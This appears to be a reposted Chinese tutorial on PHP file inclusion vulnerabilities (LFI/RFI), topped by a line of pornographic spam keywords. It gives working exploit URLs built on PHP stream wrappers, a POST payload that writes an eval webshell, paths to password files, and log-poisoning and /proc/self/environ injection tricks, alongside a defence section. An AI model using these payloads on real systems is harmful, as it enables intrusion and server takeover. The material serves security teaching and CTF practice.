国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【web安全】文件包含漏洞

這篇具有很好參考價(jià)值的文章主要介紹了【web安全】文件包含漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

目錄

1.什么是文件包含漏洞

2.產(chǎn)生原因

3.文件包含的類(lèi)型

3.1本地文件包含

3.2遠(yuǎn)程文件包含

4.攻擊利用手法

4.1 file:協(xié)議

4.2 php://協(xié)議

?4.3 zip://,bzip2://,zlib://協(xié)議?

4.4 data://協(xié)議

4.5 PHP偽協(xié)議總結(jié)?

5.如何防御?

6.常見(jiàn)系統(tǒng)的默認(rèn)路徑

7.文件包含漏洞的奇技淫巧

LFI+日志文件getshell

配合文件上傳漏洞

配合路徑遍歷漏洞

配合session文件

配合SSH日志

配合運(yùn)行環(huán)境


1.什么是文件包含漏洞

想要了解文件包含漏洞,我們首先需要了解一下什么是文件包含?

后端編程人員一般會(huì)把重復(fù)使用的函數(shù)寫(xiě)到單個(gè)文件中,需要使用時(shí)再直接調(diào)用此文件即可,該過(guò)程就被稱(chēng)為文件包含。

文件包含(File Inclusion)是一些對(duì)文件操作的函數(shù)未經(jīng)過(guò)有效過(guò)濾,運(yùn)行了惡意傳入的非預(yù)期的文件路徑,導(dǎo)致敏感信息泄露或代碼執(zhí)行。如果文件中存在惡意代碼,無(wú)論什么樣的后綴類(lèi)型,文件內(nèi)的惡意代碼都會(huì)以當(dāng)前服務(wù)器的腳本語(yǔ)言所執(zhí)行,這就導(dǎo)致了文件包含漏洞的產(chǎn)生。

隨著網(wǎng)站的業(yè)務(wù)的需求,程序開(kāi)發(fā)人員一般希望代碼更加靈活,所以將被包含的文件設(shè)置為變量,用來(lái)進(jìn)行動(dòng)態(tài)調(diào)用,但是正是這種靈活性通過(guò)動(dòng)態(tài)變量的方式引入需要包含的文件時(shí),用戶對(duì)這個(gè)變量可控而且服務(wù)端又沒(méi)有做合理的校檢或者校檢被繞過(guò)就造成了文件包含漏洞。

2.產(chǎn)生原因

文件包含的存在使得開(kāi)發(fā)變得更加靈活和方便,但同時(shí)也帶了安全問(wèn)題,導(dǎo)致客戶端可以遠(yuǎn)程調(diào)用文件,造成文件包含漏洞。

實(shí)際上被包含文件可以是任意格式的,可以是圖片、文本、源代碼等等。只要文件被包含其內(nèi)容也會(huì)被包含,并以當(dāng)前服務(wù)器腳本語(yǔ)言執(zhí)行。

大多數(shù)Web語(yǔ)言都支持文件包含操作,其中PHP語(yǔ)言所提供的文件包含功能太強(qiáng)大、太靈活,也就導(dǎo)致文件包含漏洞經(jīng)常出現(xiàn)在PHP語(yǔ)言中。這里就以PHP語(yǔ)言為例,需要打開(kāi)一下配置allow_url_fopen=On(默認(rèn)為On)?規(guī)定是否允許從遠(yuǎn)程服務(wù)器或者網(wǎng)站檢索數(shù)據(jù)。allow_url_include=On(php5.2之后默認(rèn)為Off)?規(guī)定是否允許include/require遠(yuǎn)程文件。

PHP提供的可以文件包含的四個(gè)函數(shù):

include():當(dāng)使用該函數(shù)包含文件時(shí),只有代碼執(zhí)行到include()函數(shù)時(shí)才將文件包含進(jìn)來(lái),發(fā)生錯(cuò)誤時(shí)只給出一個(gè)警告(E_WARNING),繼續(xù)向下執(zhí)行;

include_once()功能與include()相同,區(qū)別在于當(dāng)重復(fù)調(diào)用同一文件時(shí),程序只調(diào)用一次;

require()與include()的區(qū)別在于require()執(zhí)行如果發(fā)生錯(cuò)誤(E_COMPILE_ERROR),函數(shù)會(huì)輸出錯(cuò)誤信息,并終止腳本的運(yùn)行。

require_once()功能與require()相同,區(qū)別在于當(dāng)重復(fù)調(diào)用同一文件時(shí),程序只調(diào)用一次。

nighcight_file()、show_source()函數(shù)對(duì)文件進(jìn)行語(yǔ)法高亮顯示,通常能看到源代碼。

readfile()、file_get_contents()函數(shù)讀取一個(gè)文件,并寫(xiě)入輸出緩沖。

fopen()函數(shù)打開(kāi)一個(gè)文件或者url。

3.文件包含的類(lèi)型

文件包含漏洞分為本地文件包含(Loacl File Inclusion,LFI)和遠(yuǎn)程文件包含(Remote File Inclusion,RFI)兩種。攻擊者通過(guò)文件包含漏洞可以讀取系統(tǒng)中的敏感文件,還有可能導(dǎo)致任意代碼執(zhí)行漏洞。

3.1本地文件包含

本地文件包含漏洞指的是能打開(kāi)并包含本地文件的漏洞,大部分情況下遇到的文件包含漏洞都是LFI,簡(jiǎn)單的測(cè)試用例如下所示。

<?php
    $filename = $_GET['file'];
    if(isset($file)){
        include("$file");
    }else{
        echo "file not found!";
    }
?>

3.2遠(yuǎn)程文件包含

遠(yuǎn)程文件包含漏洞是指能夠包含遠(yuǎn)程服務(wù)器上的文件并執(zhí)行。由于遠(yuǎn)程服務(wù)器的文件是我們可控的,因此漏洞一旦存在危害性會(huì)很大。

該類(lèi)型需要當(dāng)目標(biāo)服務(wù)器開(kāi)啟一定配置時(shí)才可以使用,當(dāng)php.ini中的配置選項(xiàng)allow_url_fopen=on、allow_url_include=on

4.攻擊利用手法

4.1 file:協(xié)議

PHP.ini:

file:// 協(xié)議在雙off的情況下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

file:// 用于訪問(wèn)本地文件系統(tǒng),在CTF中通常用來(lái)讀取本地文件的且不受allow_url_fopen與allow_url_include的影響

【web安全】文件包含漏洞

file:// [文件的絕對(duì)路徑和文件名]

http://127.0.0.1/cmd.php?file=file://D:/software/phpStudy/WWW/phpinfo.txt

phpinfo.txt文件內(nèi)容:

<?php phpinfo(); ?>

4.2 php://協(xié)議

條件:

不需要開(kāi)啟allow_url_fopen,僅php://input、 php://stdin、 php://memory 和 php://temp 需要開(kāi)啟allow_url_include。

php:// 訪問(wèn)各個(gè)輸入/輸出流(I/O streams),在CTF中經(jīng)常使用的是php://filter和php://input,php://filter用于讀取源碼,php://input用于執(zhí)行php代碼。

參考自:PHP: php:// - Manual

php://filter 讀取源代碼并進(jìn)行base64編碼輸出,不然會(huì)直接當(dāng)做php代碼執(zhí)行就看不到源代碼內(nèi)容了。

PHP.ini:

php://filter在雙off的情況下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

【web安全】文件包含漏洞

測(cè)試現(xiàn)象:

http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php

【web安全】文件包含漏洞

php://input 可以訪問(wèn)請(qǐng)求的原始數(shù)據(jù)的只讀流, 將post請(qǐng)求中的數(shù)據(jù)作為PHP代碼執(zhí)行。

PHP.ini:

allow_url_fopen :off/on

allow_url_include:on

【web安全】文件包含漏洞

測(cè)試現(xiàn)象:

http://127.0.0.1/cmd.php?file=php://input

[POST DATA] <?php phpinfo()?>

也可以POST如下內(nèi)容生成一句話: <?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>

4.3 zip://,bzip2://,zlib://協(xié)議?

PHP.ini:

zip://, bzip2://, zlib://協(xié)議在雙off的情況下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

zip://, bzip2://, zlib:// 均屬于壓縮流,可以訪問(wèn)壓縮文件中的子文件,更重要的是不需要指定后綴名。

參考自:PHP: zlib:// - Manual

【web安全】文件包含漏洞

?4.3.1 zip://協(xié)議

zip://archive.zip#dir/file.txt

zip:// [壓縮文件絕對(duì)路徑]#[壓縮文件內(nèi)的子文件名]

測(cè)試現(xiàn)象:

http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt

先將要執(zhí)行的PHP代碼寫(xiě)好文件名為phpcode.txt,將phpcode.txt進(jìn)行zip壓縮,壓縮文件名為file.zip,如果可以上傳zip文件便直接上傳,若不能便將file.zip重命名為file.jpg后在上傳,其他幾種壓縮格式也可以這樣操作。

由于#在get請(qǐng)求中會(huì)將后面的參數(shù)忽略所以使用get請(qǐng)求時(shí)候應(yīng)進(jìn)行url編碼為%23,且此處經(jīng)過(guò)測(cè)試相對(duì)路徑是不可行,所以只能用絕對(duì)路徑。

【web安全】文件包含漏洞

?4.3.2 bzip2://協(xié)議

使用方法:

compress.bzip2://file.bz2

測(cè)試現(xiàn)象:

http://127.0.0.1/cmd.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

or

http://127.0.0.1/cmd.php?file=compress.bzip2://./file.jpg

【web安全】文件包含漏洞

4.3.3 zlib://協(xié)議

使用方法:

compress.zlib://file.gz

測(cè)試現(xiàn)象:

http://127.0.0.1/cmd.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

or

http://127.0.0.1/cmd.php?file=compress.zlib://./file.jpg

【web安全】文件包含漏洞

?4.4 data://協(xié)議

經(jīng)過(guò)測(cè)試官方文檔上存在一處問(wèn)題,經(jīng)過(guò)測(cè)試PHP版本5.2,5.3,5.5,7.0;data:// 協(xié)議是是受限于allow_url_fopen的,官方文檔上給出的是NO,所以要使用data://協(xié)議需要滿足雙on條件

PHP.ini:

data://協(xié)議必須雙在on才能正常使用;

allow_url_fopen :on

allow_url_include:on

參考自:PHP: data:// - Manual, 官方文檔上allow_url_fopen應(yīng)為yes。

【web安全】文件包含漏洞

測(cè)試現(xiàn)象:

http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>

or

http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

也可以:

http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>

or

http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

【web安全】文件包含漏洞

4.5 PHP偽協(xié)議總結(jié)?

PHP封裝協(xié)議在CTF蠻常見(jiàn)的,是經(jīng)常會(huì)遇到的出題點(diǎn),如下便是對(duì)本篇涉及的封裝協(xié)議進(jìn)行的總結(jié),期待小伙伴的交流和補(bǔ)充。

【web安全】文件包含漏洞

上述中,php://filter,php://input,zip://這三個(gè)用的最多,就像data需要同時(shí)為on,條件太苛刻,幾乎遇不到 。?

5.如何防御?

1、訪問(wèn)路徑限制

PHP中使用open_basedir配置限制訪問(wèn)在指定的區(qū)域,限制被包含的文件只能是某一文件夾內(nèi)。

2、過(guò)濾輸入

過(guò)濾.(點(diǎn))/(反斜杠)\(反斜杠)等特殊字符,禁止目錄跳轉(zhuǎn)字符如../。

3、關(guān)閉高危配置

PHP文件配置allow_url_includeallow_url_fopen最小權(quán)限化。

4、白名單 對(duì)需要包含的文件設(shè)置文件白名單,包含文件的驗(yàn)證。

5、避免參數(shù)

盡量不要使用動(dòng)態(tài)包含,可以在需要包含的頁(yè)面固定寫(xiě)好。

6.常見(jiàn)系統(tǒng)的默認(rèn)路徑

c:\boot.ini //查看系統(tǒng)版本

c:\windows\repair\sam //存儲(chǔ)Windows系統(tǒng)初次安裝的密碼

c:\windows\win.ini

/etc/passwd //賬戶信息

/etc/shadow //賬戶密碼文件

/var/lib/php/sess_PHPSESSID? //存儲(chǔ)session文件

7.文件包含漏洞的奇技淫巧

LFI+日志文件getshell

日志文件往往會(huì)包含我們的請(qǐng)求記錄,如果我們知道日志的文件位置,那么我們就可以將惡意的php代碼寫(xiě)入到日志中,然后再通過(guò)文件包含漏洞就可以執(zhí)行相關(guān)的代碼。

很多時(shí)候,web服務(wù)器會(huì)將請(qǐng)求寫(xiě)入到日志文件中,比如說(shuō)apache。在用戶發(fā)起請(qǐng)求時(shí),會(huì)將請(qǐng)求寫(xiě)入access.log,當(dāng)發(fā)生錯(cuò)誤時(shí)將錯(cuò)誤寫(xiě)入error.log。默認(rèn)情況下,日志保存路徑在 /var/log/apache2/。

配合文件上傳漏洞

一般情況下,文件包含漏洞配合文件上傳漏洞使用更佳。利用文件上傳漏洞,將木馬文件上傳到相關(guān)目錄下,再通過(guò)文件包含漏洞執(zhí)行該木馬。

配合路徑遍歷漏洞

一般情況下,通過(guò)路徑遍歷直接包含所要查看的文件。

配合session文件

php的session文件的保存路徑可以在phpinfo的session.save_path看到。

常見(jiàn)存放位置:

  • /var/lib/php/sess_PHPSESSID
  • /var/lib/php/sess_PHPSESSID
  • /tmp/sess_PHPSESSID
  • /tmp/sessions/sess_PHPSESSID

session的文件名格式為sess_[phpsessid]。而phpsessid在發(fā)送的請(qǐng)求的cookie字段中可以看到。

配合SSH日志

使用ssh -pssh端口 '<?php phpinfo(); ?>'@ip地址將惡意代碼注入日志中,然后可包含該日志文件。

【web安全】文件包含漏洞

默認(rèn)情況下為/var/log/auth.log

配合運(yùn)行環(huán)境

php以cgi方式運(yùn)行,這樣environ才會(huì)保持UA頭。environ文件存儲(chǔ)位置已知且environ文件可讀,/proc/self/environ。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-465792.html

GET /index.php?file=../../../../proc/self/environ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 <?phpinfo();?> 
Connection: close

到了這里,關(guān)于【web安全】文件包含漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【W(wǎng)eb安全】文件上傳漏洞

    【W(wǎng)eb安全】文件上傳漏洞

    目錄 1. 文件上傳漏洞概述 1.1 FCKEditor文件上傳漏洞 1.2 繞過(guò)文件上傳檢查功能 2. 功能還是漏洞 2.1 Apache文件解析 2.2 IIS文件解析 2.3 PHP CGI路徑解析 2.4 利用上傳文件釣魚(yú) ?3. 設(shè)計(jì)安全的文件上傳功能 文件上傳漏洞是指用戶上傳了一個(gè)可執(zhí)行的腳本文件,并通過(guò)此腳本文件獲得了

    2024年02月08日
    瀏覽(25)
  • Web安全漏洞介紹及防御-文件上傳漏洞

    Web安全漏洞介紹及防御-文件上傳漏洞

    ??博客主頁(yè):舉杯同慶 – 生命不息,折騰不止 ??訂閱專(zhuān)欄:『Web安全』 ??如覺(jué)得博主文章寫(xiě)的不錯(cuò),或?qū)δ阌兴鶐椭脑挘?qǐng)多多支持呀! ??關(guān)注?、點(diǎn)贊??、收藏??、評(píng)論。 話題討論 中國(guó)經(jīng)濟(jì)周刊-2022-07-08 新聞 萬(wàn)豪國(guó)際集團(tuán)證實(shí)了近期一起數(shù)據(jù)泄露事件,一個(gè)月

    2024年02月02日
    瀏覽(24)
  • Web安全:文件上傳漏洞測(cè)試(防止 黑客利用此漏洞.)

    Web安全:文件上傳漏洞測(cè)試(防止 黑客利用此漏洞.)

    現(xiàn)在大多的網(wǎng)站和Web應(yīng)用系統(tǒng)都會(huì)有上傳功能(比如:文檔,圖片,頭像,視頻上傳等.),而程序員在開(kāi)發(fā)文件上傳功能時(shí),沒(méi)有對(duì)代碼做嚴(yán)格校驗(yàn)上傳文件的后綴和文件類(lèi)型,此時(shí)攻擊者就可以上傳一個(gè)與網(wǎng)站腳本語(yǔ)言相對(duì)應(yīng)的惡意代碼動(dòng)態(tài)腳本,例如(php,jsp、aspx,asp文

    2024年02月11日
    瀏覽(27)
  • Web安全之文件上傳漏洞詳解

    Web安全之文件上傳漏洞詳解

    文件上傳漏洞是指用戶上傳了一個(gè)可執(zhí)行的腳本文件,并通過(guò)此腳本文件獲得了執(zhí)行服務(wù)器端命令的能力。這種攻擊方式是最為直接和有效的,“文件上傳”本身沒(méi)有問(wèn)題,有問(wèn)題的是文件上傳后,服務(wù)器怎么處理、解釋文件。如果服務(wù)器的處理邏輯做的不夠安全,則會(huì)導(dǎo)致

    2024年02月13日
    瀏覽(27)
  • Web 安全之文件上傳漏洞詳解

    目錄 文件上傳漏洞的類(lèi)型 文件上傳的攻擊方式 文件上傳漏洞影響 防護(hù)措施 小結(jié) 文件上傳漏洞是網(wǎng)絡(luò)安全中的常見(jiàn)問(wèn)題,通常發(fā)生在網(wǎng)站或應(yīng)用程序允許用戶上傳文件到服務(wù)器的場(chǎng)景。這類(lèi)漏洞如果被攻擊者利用,可能導(dǎo)致數(shù)據(jù)泄露、非法文件分發(fā)、服務(wù)器入侵甚至整個(gè)系

    2024年02月04日
    瀏覽(31)
  • 23 WEB漏洞-文件上傳之解析漏洞編輯器安全

    各個(gè)WEB編輯器安全講解 https://navisec.it/編輯器漏洞手冊(cè)/ 各個(gè)CMS文件上傳簡(jiǎn)要講解 wordpress,phpcms, 參考共享的中間件漏洞PDF IIS6/7簡(jiǎn)要說(shuō)明-本地搭建 Apache配置安全–vulhub Apache解析漏洞-低版本 利用場(chǎng)景: 如果對(duì)方中間件apache屬于低版本,我們可以利用文件上傳,上傳一個(gè)不識(shí)

    2024年02月11日
    瀏覽(31)
  • 《WEB安全漏洞30講》(第5講)任意文件上傳漏洞

    《WEB安全漏洞30講》(第5講)任意文件上傳漏洞

    文件上傳漏洞,指攻擊者利用程序缺陷繞過(guò)系統(tǒng)對(duì)文件的驗(yàn)證與處理策略將惡意程序上傳到服務(wù)器并獲得執(zhí)行服務(wù)器端命令的能力。 這個(gè)漏洞其實(shí)非常簡(jiǎn)單,就是攻擊者給服務(wù)器上傳了惡意的木馬程序,然后利用此木馬程序執(zhí)行操作系統(tǒng)命令,從而獲得服務(wù)器權(quán)限,造成嚴(yán)重

    2024年02月12日
    瀏覽(23)
  • 049-WEB攻防-文件上傳&存儲(chǔ)安全&OSS對(duì)象&分站&解析安全&解碼還原&目錄執(zhí)行

    049-WEB攻防-文件上傳&存儲(chǔ)安全&OSS對(duì)象&分站&解析安全&解碼還原&目錄執(zhí)行

    1、文件上傳-安全解析方案-目錄權(quán)限解碼還原 2、文件上傳-安全存儲(chǔ)方案-分站存儲(chǔ)OSS對(duì)象 演示案例: ?文件-解析方案-執(zhí)行權(quán)限解碼還原 ?文件-存儲(chǔ)方案-分站存儲(chǔ)OSS對(duì)象 ?實(shí)例-解析存儲(chǔ)-傳輸分站OSS存儲(chǔ) 將源碼復(fù)制到對(duì)應(yīng)目錄下,并創(chuàng)建image.wusuowei.com文件夾,存儲(chǔ)源碼

    2024年04月12日
    瀏覽(24)
  • 小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    # 知識(shí)點(diǎn): 1 、中間件安全問(wèn)題 2 、中間件文件上傳解析 3 、 Web 應(yīng)用編輯器上傳 編輯器也就是第三方插件,一般都是文件上傳漏洞 # 詳細(xì)點(diǎn): 1 、檢測(cè)層面:前端,后端等 2 、檢測(cè)內(nèi)容:文件頭,完整性,二次渲染等 3 、檢測(cè)后綴:黑名單,白名單, MIME 檢測(cè)等 4 、繞過(guò)技

    2024年03月16日
    瀏覽(32)
  • 一級(jí)必殺,防不勝防的漏洞,WEB安全基礎(chǔ)入門(mén)—文件上傳漏洞

    一級(jí)必殺,防不勝防的漏洞,WEB安全基礎(chǔ)入門(mén)—文件上傳漏洞

    歡迎關(guān)注訂閱專(zhuān)欄! WEB安全系列包括如下三個(gè)專(zhuān)欄: 《WEB安全基礎(chǔ)-服務(wù)器端漏洞》 《WEB安全基礎(chǔ)-客戶端漏洞》 《WEB安全高級(jí)-綜合利用》 知識(shí)點(diǎn)全面細(xì)致,邏輯清晰、結(jié)合實(shí)戰(zhàn),并配有大量練習(xí)靶場(chǎng),讓你讀一篇、練一篇,掌握一篇,在學(xué)習(xí)路上事半功倍,少走彎路! 歡

    2024年01月18日
    瀏覽(18)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包